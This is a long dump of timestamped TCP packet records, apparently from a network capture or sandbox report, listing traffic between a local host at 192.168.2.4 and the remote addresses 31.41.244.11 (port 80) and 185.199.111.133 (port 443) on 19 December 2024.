                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513498068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513899088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513952971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513953924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513989925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514029980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514029980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514784098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514838934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514873028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514883995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514883995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.514981985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.515666008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.515721083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.515734911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.515757084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.515778065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.515918970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.516547918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.516657114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.516674995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.516691923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.516740084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.516740084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.517441034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.517493963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.517494917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.517530918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.517570019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.517570019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.518321037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.518378019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.518414021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.518418074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.518426895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.518713951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.519239902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.519294977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.519306898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.519349098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.519356966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.519520044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.520136118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.520190001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.520226002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.520237923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.520237923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521015882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521071911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521092892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521106958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521157026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521949053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.521997929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522018909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522037029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522080898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522080898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522793055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522847891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522852898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522885084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522923946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.522923946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.523699999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.523755074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.523789883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.523802042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.523802042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.523886919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.524665117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.524699926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.524720907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.524736881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.524745941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.524801016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.525537014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.525592089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.525628090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.525640011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.525640011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.525672913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.526439905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.526529074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.526547909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.526567936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.526635885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.526707888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.527266026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.527331114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.527333975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.527370930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.527410030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.527410030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.528147936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.528209925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.528264999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.528301001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.528342962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.528342962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529015064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529069901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529073000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529105902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529149055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529149055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529901028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529957056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529967070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.529992104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530016899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530119896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530860901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530930996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530935049 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530946970 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.530965090 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531007051 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531119108 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531119108 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531119108 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531147003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531164885 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531218052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531245947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531254053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531277895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531368017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.531984091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532040119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532040119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532077074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532119036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532119036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532850981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532907009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532942057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532946110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.532946110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533005953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533766985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533812046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533823013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533859968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533876896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.533904076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.534646034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.534698009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.534698963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.534734964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.534775019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.534775019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.535563946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.535618067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.535639048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.535654068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.535692930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.535692930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.536473036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.536540031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.536565065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.536576033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.536648035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.536695957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.537309885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.537367105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.537391901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.537403107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.537439108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.537439108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.538189888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.538249016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.538312912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.538503885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.543900013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544002056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544007063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544051886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544058084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544161081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544362068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544431925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544528961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544893980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544982910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.544991970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.545150995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.560333014 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.560364008 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.560417891 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.560439110 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.560472012 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.588541031 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.588587999 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.588857889 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.588922977 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.629616022 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706474066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706548929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706590891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706836939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706850052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706940889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.706975937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.707098961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.707098961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.707727909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.707815886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.707894087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709692955 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709729910 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709753990 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709769964 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709907055 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709908009 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.709979057 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710040092 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710611105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710663080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710701942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710715055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710715055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710756063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.710938931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711011887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711047888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711060047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711060047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711122036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711731911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711787939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711827040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.711827040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.712074995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.712129116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.712165117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.712198973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.712984085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.713041067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.713077068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.713114977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.713129997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.716612101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717031956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717149019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717175961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717814922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717848063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717883110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717890024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717919111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717941999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717941999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717956066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.717982054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718010902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718034029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718080997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718137980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718172073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718206882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718235016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.718249083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.719300032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.719352007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.719388008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.719419003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.719435930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.720124960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.720307112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.720341921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.720369101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.721147060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.721182108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.721219063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.721220970 CET4986080192.168.2.431.41.244.11
